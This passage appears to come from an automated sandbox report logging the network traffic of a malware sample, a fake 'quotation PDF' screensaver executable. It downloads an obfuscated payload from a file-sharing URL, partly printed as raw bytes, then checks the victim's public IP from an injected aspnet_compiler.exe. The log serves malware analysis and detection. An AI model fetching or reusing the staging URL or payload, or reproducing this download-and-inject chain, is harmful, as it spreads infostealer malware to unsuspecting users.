Nov 18, 2024 11:45:58.687031031 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 10:45:58 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9e341d7725db781df113bd5bcf40f734 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49955	132.226.247.73	80	2928	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 11:45:59.460335016 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 11:46:01.558518887 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 10:46:01 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9c1cbc67db38d9210d6dd5adb162b930 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49974	132.226.247.73	80	2928	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 11:46:02.311074972 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 11:46:03.177588940 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 10:46:03 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4b42ba7c8dc844a975227d3a7b6eb395 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49984	132.226.247.73	80	2928	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 11:46:03.948013067 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 11:46:04.834595919 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 10:46:04 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0451f2b1b07c164119ba247dad5ca250 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49988	132.226.247.73	80	2928	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 11:46:05.598119020 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 11:46:06.458625078 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 10:46:06 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: dc9826d74785163bc31222476062e93b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49990	132.226.247.73	80	2928	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 11:46:07.221295118 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 11:46:08.093291998 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 10:46:07 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 777dde4c797501db38a46251192bcdd6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49992	132.226.247.73	80	2928	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 11:46:08.854763031 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 11:46:09.719069004 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 10:46:09 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d39b50c5424412327e445f48387d6b61 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	188.114.97.3	443	828	C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 10:45:08 UTC	95	OUT	GET /data-package/zWkbOqX7/download HTTP/1.1 Host: filetransfer.io Connection: Keep-Alive
2024-11-18 10:45:09 UTC	1247	IN	HTTP/1.1 302 Found Date: Mon, 18 Nov 2024 10:45:09 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Powered-By: Nette Framework 3 X-Frame-Options: SAMEORIGIN Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly Set-Cookie: PHPSESSID=1qcud1ktu655uk54t14g7hbk8o; expires=Mon, 02-Dec-2024 10:45:09 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: X-Requested-With Location: https://s24.filetransfer.io/storage/download/BbYQU8RBGGG7 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bE6kksL%2Bklh2sdbns%2FLxdmQpL%2BlZ9l0RxHmx17WVTpP%2FFJ9AheggRdwf59xJtOViHXC70y13tCWha%2BKhYEQ7pOGsbDbPZYFSA0mHtmCPwgptI8mBOaz9Co%2F1qUkHk1ihKt8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e475e888a722e1f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1957&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=709&delivery_rate=1459677&cwnd=250&unsent_bytes=0&cid=20b04ddae0009724&ts=962&x=0"
2024-11-18 10:45:09 UTC	134	IN	Data Raw: 38 30 0d 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 0a 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 34 2e 66 69 6c 65 74 72 61 6e 73 66 65 72 2e 69 6f 2f 73 74 6f 72 61 67 65 2f 64 6f 77 6e 6c 6f 61 64 2f 42 62 59 51 55 38 52 42 47 47 47 37 22 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 68 65 72 65 20 74 6f 20 63 6f 6e 74 69 6e 75 65 3c 2f 61 3e 2e 3c 2f 70 3e 0d 0a Data Ascii: 80<h1>Redirect</h1><p><a href="https://s24.filetransfer.io/storage/download/BbYQU8RBGGG7">Please click here to continue</a>.</p>
2024-11-18 10:45:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	188.114.96.3	443	828	C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 10:45:10 UTC	98	OUT	GET /storage/download/BbYQU8RBGGG7 HTTP/1.1 Host: s24.filetransfer.io Connection: Keep-Alive
2024-11-18 10:45:11 UTC	1247	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 10:45:11 GMT Content-Type: application/octet-stream Content-Length: 1056256 Connection: close Last-Modified: Mon, 18 Nov 2024 07:19:56 GMT Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly Set-Cookie: PHPSESSID=296ac077594b4011a522909a4cac754e; expires=Mon, 02-Dec-2024 10:45:10 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Disposition: attachment; filename="Dcabbcudb.dat" Accept-Ranges: bytes Accept-Ranges: bytes ETag: "673aea9c-101e00" cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tePq6M5Kydht7i3q%2FoJ5gTI2DAOf%2BZ1koOKMotIQ8bvUShdKKPVvPRP4GIoszbXAA6Xreu1JujDiGPITUvlZnSpdlinefnPw3PO0g8SExGVUyISweJdRagLtA1%2Bd04c6uwtfK%2F6N"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e475e92acc76b7f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1729&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=712&delivery_rate=1638009&cwnd=250&unsent_bytes=0&cid=4056563f695f4430&ts=1163&x=0"
2024-11-18 10:45:11 UTC	122	IN	Data Raw: 7c 62 a3 31 3b 33 31 38 37 31 38 33 ce c7 33 31 80 33 31 38 33 31 38 33 71 38 33 31 38 33 31 38 33 31 38 33 31 38 33 31 38 33 31 38 33 31 38 33 31 38 33 31 38 33 31 38 33 31 38 33 b1 38 33 31 36 2c 8b 36 33 85 31 fe 10 80 32 7d f5 12 65 50 5a 42 18 43 43 57 54 43 59 5e 11 5b 52 5f 56 5c 45 18 51 54 18 41 44 56 13 58 56 13 75 77 60 11 55 5c 55 5d 1d 3c 35 39 15 38 Data Ascii: \|b1;3187183313183183q831831831831831831831831831831831838316,6312}ePZBCCWTCY^[R_V\EQTADVXVuw`U\U]<598
2024-11-18 10:45:11 UTC	1369	IN	Data Raw: 33 31 38 33 31 38 63 74 38 33 7d 39 30 31 33 c4 80 f4 33 31 38 33 31 38 33 31 d8 33 3f 19 38 30 08 33 31 2e 23 31 38 35 31 38 33 31 38 33 ff 0d 23 31 38 13 31 38 33 71 28 33 31 38 73 31 38 13 31 38 33 33 38 33 35 38 33 31 38 33 31 38 37 31 38 33 31 38 33 31 38 b3 21 38 33 33 38 33 31 38 33 31 3b 33 71 bd 33 31 28 33 31 28 33 31 38 33 21 38 33 21 38 33 31 38 33 31 37 33 31 38 33 31 38 33 31 38 33 31 b8 06 21 38 78 31 38 33 31 78 23 31 04 30 31 38 33 31 38 33 31 38 33 31 38 33 31 38 33 31 38 33 31 58 23 31 34 33 31 38 33 31 38 33 31 38 33 31 38 33 31 38 33 31 38 33 31 38 33 31 38 33 31 38 33 31 38 33 31 38 33 31 38 33 31 38 33 31 38 33 31 38 33 31 38 33 31 38 33 11 38 33 39 38 33 31 38 33 31 38 33 31 38 33 39 18 33 31 70 33 31 38 33 31 38 33 31 38 33 31 16 Data Ascii: 318318ct83}9013318318313?8031.#185183183#18183q(318s1818338358318318718318318!833831831;3q31(31(3183!83!831831731831831831!8x1831x#101831831831831831831X#14318318318318318318318318318318318318318318318318318383983183183183931p31831831831
2024-11-18 10:45:11 UTC	1369	IN	Data Raw: 31 3b 03 39 38 37 31 38 33 31 38 33 31 38 33 26 12 72 2d 38 33 31 38 33 31 45 33 31 38 ed 32 38 33 6a 3c 33 31 01 33 31 38 24 31 38 32 32 08 3b 31 3c 33 31 38 33 31 38 33 31 38 24 1b 79 2f 31 38 33 31 38 33 69 38 33 31 b7 32 31 38 d4 30 38 33 08 38 33 31 2f 33 31 39 20 01 3c 33 35 38 33 31 38 33 31 38 33 31 2f 19 22 08 30 31 3c 33 31 38 33 31 38 33 31 38 33 1b 2b 03 32 38 37 31 38 33 31 38 33 31 38 33 31 12 20 01 3b 33 b1 38 33 31 39 33 31 29 1b 99 3a 33 37 18 31 31 38 33 cf 36 33 31 00 33 31 38 33 cf 34 33 31 7d 30 31 38 33 66 38 33 31 3d 33 31 38 1d 31 38 33 09 6a 33 31 38 4d 9d 3a 33 35 10 57 36 38 35 11 38 33 31 38 4d a8 3a 33 35 43 a5 33 38 37 0b f4 cc ce c7 15 11 38 33 31 38 0b f0 c7 cc ce 46 98 33 38 37 19 58 34 31 3e 13 30 38 33 31 46 aa 33 38 37 Data Ascii: 1;987183183183&r-831831E318283j<31318$1822;1<318318318$y/183183i831218083831/319 <35831831831/"01<3183183183+2871831831831 ;3831931):3711836313183431}0183f831=318183j318M:35W6858318M:35C3878318F387X41>0831F387
2024-11-18 10:45:11 UTC	1369	IN	Data Raw: 3c 1b 79 30 33 37 18 dd 88 90 30 11 42 33 ad 4a 6b 11 7e 91 e8 3f 52 4f a1 31 31 3c 48 a6 3a 33 35 59 4d d4 3a 33 35 10 7b 39 38 35 19 3f 33 31 13 b3 7c 38 33 35 18 34 31 38 33 09 c7 cf ce c7 13 32 de 2b e2 18 40 45 22 aa 50 46 aa 33 38 37 4a 43 31 31 3c 52 4f dd 31 31 3c 1b 79 30 33 37 18 76 f6 1a c5 11 e0 c6 84 8c 52 4f a1 31 31 3c 48 04 3a 33 35 59 4d d4 3a 33 35 10 7b 39 38 35 19 30 33 31 13 b3 7f 38 33 35 18 1a 31 38 33 09 93 cf ce c7 13 7d af bc 09 18 67 ce 3e 5d 50 46 aa 33 38 37 4a 0c 31 31 3c 52 4f dd 31 31 3c 1b 79 30 33 37 18 fb 8a 3e 6d 11 9c 2c a3 1e 6a 11 11 54 2b 68 52 4f a1 31 31 3c 48 a1 3a 33 35 59 4d d4 3a 33 35 10 7b 39 38 35 19 31 33 31 13 b3 1f 38 33 35 18 27 31 38 33 cf 36 33 31 00 7a cd c7 cc 11 08 8f da 8c 13 37 38 33 31 5b 13 64 Data Ascii: <y0370B3Jk~?RO11<H:35YM:35{985?31\|83541832+@E"PF387JC11<RO11<y037vRO11<H:35YM:35{985031835183}g>]PF387J11<RO11<y037>m,jT+hRO11<H:35YM:35{985131835'183631z7831[d
2024-11-18 10:45:11 UTC	1369	IN	Data Raw: 6a 11 b3 da 1a 61 52 4f a1 31 31 3c 48 52 3a 33 35 59 4d d4 3a 33 35 10 7b 39 38 35 11 e8 69 09 6d 13 a1 51 c7 b2 59 13 c9 ca 96 97 59 4d a8 3a 33 35 43 0f 33 38 37 50 46 d6 33 38 37 19 70 3b 31 3e 1b 24 38 33 1a b8 70 31 38 37 11 30 33 31 38 4d a8 3a 33 35 43 a0 33 38 37 0b be c4 ce c7 15 11 37 33 31 38 0b 4a cf cc ce 18 ea 2f eb 3e 11 5c c3 d7 7b 52 4f a1 31 31 3c 48 af 3a 33 35 59 4d d4 3a 33 35 10 7b 39 38 35 11 5a e5 a1 8c 13 e1 53 3c a3 59 13 67 a4 be 01 59 4d a8 3a 33 35 43 1e 33 38 37 50 46 d6 33 38 37 19 70 3b 31 3e 1b 27 38 33 1a b8 78 31 38 37 11 2a 33 31 38 0b 10 cf cc ce 18 03 e8 4e 34 11 bf 6b 50 3c 52 4f a1 31 31 3c 48 b6 3a 33 35 59 4d d4 3a 33 35 10 7b 39 38 35 11 82 98 b4 dc 13 c7 dd 06 db 60 13 ac a2 43 fb 59 4d a8 3a 33 35 43 7a 33 38 Data Ascii: jaRO11<HR:35YM:35{985imQYYM:35C387PF387p;1>$83p1870318M:35C3877318J/>\{RO11<H:35YM:35{985ZS<YgYM:35C387PF387p;1>'83x187*318N4kP<RO11<H:35YM:35{985`CYM:35Cz38
2024-11-18 10:45:11 UTC	1369	IN	Data Raw: 31 00 b0 c3 c7 cc 11 8c 24 df d6 13 32 38 33 31 5b 13 89 c1 39 ed 59 4d a8 3a 33 35 43 09 33 38 37 50 46 d6 33 38 37 19 70 3b 31 3e 13 e5 17 54 b7 18 2c 14 94 b1 50 46 aa 33 38 37 4a 71 31 31 3c 52 4f dd 31 31 3c 1b 79 30 33 37 10 10 31 38 18 b1 13 33 31 3c 13 22 38 33 31 00 1e c3 c7 cc 11 60 28 00 cd 13 32 38 33 31 5b 13 21 4f 17 b6 59 4d a8 3a 33 35 43 0a 33 38 37 50 46 d6 33 38 37 19 70 3b 31 3e 13 df 81 9b 32 18 49 31 a4 41 69 18 b6 29 73 36 50 46 aa 33 38 37 4a ac 31 31 3c 52 4f dd 31 31 3c 1b 79 30 33 37 10 17 31 38 18 b1 08 33 31 3c 13 3d 38 33 31 46 aa 33 38 37 4a 58 31 31 3c 09 f2 c9 cc ce 1e 13 14 38 33 31 00 8b c0 c7 cc 1b 18 8c 20 81 64 11 19 5c 7e 70 52 4f a1 31 31 3c 48 44 3a 33 35 59 4d d4 3a 33 35 10 7b 39 38 35 11 78 45 45 cd 13 50 44 1e Data Ascii: 1$2831[9YM:35C387PF387p;1>T,PF387Jq11<RO11<y0371831<"831`(2831[!OYM:35C387PF387p;1>2I1Ai)s6PF387J11<RO11<y0371831<=831F387JX11<831 d\~pRO11<HD:35YM:35{985xEEPD
2024-11-18 10:45:11 UTC	1369	IN	Data Raw: 3f 33 37 12 33 5b 10 9b 33 38 35 4f 93 31 31 3c 1b 51 3f 33 37 46 9f 33 38 37 19 5c 34 31 3e 19 31 52 1b 99 3a 33 37 46 98 33 38 37 19 58 34 31 3e 4d 9d 3a 33 35 10 57 36 38 35 1b 38 59 19 90 31 31 3e 4d 9a 3a 33 35 10 53 36 38 35 4f 94 31 31 3c 1b 55 3f 33 37 12 33 5b 10 9b 33 38 35 4f 93 31 31 3c 1b 51 3f 33 37 46 9f 33 38 37 19 5c 34 31 3e 19 31 52 1b 99 3a 33 37 46 98 33 38 37 19 58 34 31 3e 4d 9d 3a 33 35 10 57 36 38 35 1b 38 59 19 90 31 31 3e 4d 9a 3a 33 35 10 53 36 38 35 4f 94 31 31 3c 1b 55 3f 33 37 12 33 5b 10 9b 33 38 35 4f 93 31 31 3c 1b 51 3f 33 37 46 9f 33 38 37 19 5c 34 31 3e 19 31 52 1b 99 3a 33 37 46 98 33 38 37 19 58 34 31 3e 4d 9d 3a 33 35 10 57 36 38 35 1b 38 30 01 30 33 35 38 33 31 38 33 31 38 33 31 38 19 70 44 33 31 38 33 31 38 1b 35 Data Ascii: ?373[385O11<Q?37F387\41>1R:37F387X41>M:35W6858Y11>M:35S685O11<U?373[385O11<Q?37F387\41>1R:37F387X41>M:35W6858Y11>M:35S685O11<U?373[385O11<Q?37F387\41>1R:37F387X41>M:35W685800358318318318pD3183185
2024-11-18 10:45:11 UTC	1369	IN	Data Raw: 13 31 38 33 31 00 f2 ce c7 cc 1b 46 9f 33 38 37 19 5c 34 31 3e 13 33 38 33 31 46 aa 33 38 37 4a 7c 31 31 3c 09 93 c7 cc ce 1e 13 33 38 33 31 00 a4 ce c7 cc 23 38 33 26 12 33 31 38 21 31 38 27 1b 38 33 31 2a 33 31 2e 19 31 38 33 22 08 30 31 3c 33 31 38 33 31 38 33 31 38 33 1b 2a 33 31 2f 19 31 38 33 22 08 30 31 3c 33 31 38 33 31 38 33 31 38 33 1b 2a 33 31 2c 19 31 38 33 22 08 30 31 3c 33 31 38 33 31 38 33 31 38 33 1b 2a 33 31 2f 19 31 38 33 22 08 30 31 3c 33 31 38 33 31 38 33 31 38 33 1b 2a 33 31 2f 19 31 38 33 22 08 30 31 3c 33 31 38 33 31 38 33 31 38 33 1b 2a 33 31 2f 19 31 38 33 22 08 30 31 3c 33 31 38 33 31 38 33 31 38 33 1b 2a 33 31 2f 19 31 38 33 22 08 30 31 3c 33 31 38 33 31 38 33 31 38 33 1b 2a 33 31 2c 19 31 38 33 22 08 30 31 3c 33 31 38 33 31 38 Data Ascii: 1831F387\41>3831F387J\|11<3831#83&318!18'83131.183"01<318318318331/183"01<318318318331,183"01<318318318331/183"01<318318318331/183"01<318318318331/183"01<318318318331/183"01<318318318331,183"01<318318
2024-11-18 10:45:11 UTC	1369	IN	Data Raw: 31 38 33 22 08 30 31 3c 33 31 38 33 31 38 33 31 38 33 1b 2a 33 31 2f 19 31 38 33 22 08 30 31 3c 33 31 38 33 31 38 33 31 38 33 1b 2a 33 31 2f 19 31 38 33 22 08 30 31 3c 33 31 38 33 31 38 33 31 38 33 1b 2b 03 32 38 37 31 38 33 31 38 33 31 38 33 31 12 20 01 3b 33 b1 38 33 31 39 33 31 29 1b 99 3a 33 37 18 32 31 38 33 cf 36 33 31 00 33 31 38 33 cf 34 33 31 7d 30 31 38 33 1f 38 33 31 3d 33 31 38 64 31 38 33 09 11 33 31 38 4d 9a 3a 33 35 10 53 36 38 35 11 38 33 31 38 4d a8 3a 33 35 43 72 33 38 37 0b f4 cc ce c7 15 11 38 33 31 38 0b f0 c7 cc ce 46 9f 33 38 37 19 5c 34 31 3e 13 33 38 33 31 46 aa 33 38 37 4a 00 31 31 3c 09 92 c7 cc ce 1e 13 33 38 33 31 00 ab ce c7 cc 1b 2a 33 31 2f 19 31 38 33 23 38 33 25 12 33 31 38 21 31 38 27 1b 38 33 31 2b 03 32 38 37 31 38 33 Data Ascii: 183"01<318318318331/183"01<318318318331/183"01<3183183183+2871831831831 ;3831931):3721836313183431}0183831=318d183318M:35S6858318M:35Cr3878318F387\41>3831F387J11<3831*31/183#83%318!18'831+287183
2024-11-18 10:45:11 UTC	1369	IN	Data Raw: 38 33 4f a1 31 31 3c 48 67 3a 33 35 02 ff ce c7 cc 17 18 32 31 38 33 09 f9 cc ce c7 4d 9d 3a 33 35 10 57 36 38 35 11 38 33 31 38 4d a8 3a 33 35 43 71 33 38 37 0b 9b cc ce c7 15 11 38 33 31 38 0b a9 c7 cc ce 12 21 31 38 24 1b 38 33 31 2a 33 31 2c 19 31 38 33 23 38 33 26 12 33 31 38 21 31 38 25 1b 38 33 31 2a 33 31 2e 19 31 38 33 23 38 33 26 12 33 31 38 21 31 38 24 1b 38 33 31 2a 33 31 2f 19 31 38 33 23 38 33 26 12 33 31 38 21 31 38 24 1b 38 33 31 1a 33 25 9d 17 31 38 32 1b 38 33 31 3b 03 38 38 37 31 38 33 31 38 33 31 38 33 26 12 20 01 3f 33 35 38 33 31 38 33 31 38 33 31 38 19 32 08 3b 31 3c 33 31 38 33 31 38 33 31 38 33 1b 79 2f 31 38 33 31 38 33 43 38 33 31 3d 31 31 38 44 33 38 33 09 38 33 31 2f 33 31 39 30 01 30 33 35 38 33 31 38 33 31 38 33 31 38 19 70 Data Ascii: 83O11<Hg:352183M:35W6858318M:35Cq3878318!18$83131,183#83&318!18%83131.183#83&318!18$831*31/183#83&318!18$8313%182831;887183183183& ?3583183183182;1<3183183183y/183183C831=118D383831/31900358318318318p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49942	188.114.96.3	443	2928	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 10:45:58 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 10:45:58 UTC	848	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 10:45:58 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 28241 Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ERnvNQTEbfTgOA91SX5x5ExItCn1Hu%2BkVQq6fGvkUDL2UfCs6iFep1BLQ5kOzInOq6po8%2BB9Pty32pkwtrlzfKsIwGkoEFWbHH5ljXnWkZEWkQrwXeX2FoRA65nNewgUfKXa0log"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e475fbf9fe9e936-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2149&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1389635&cwnd=251&unsent_bytes=0&cid=0ece4dc12d342af7&ts=207&x=0"
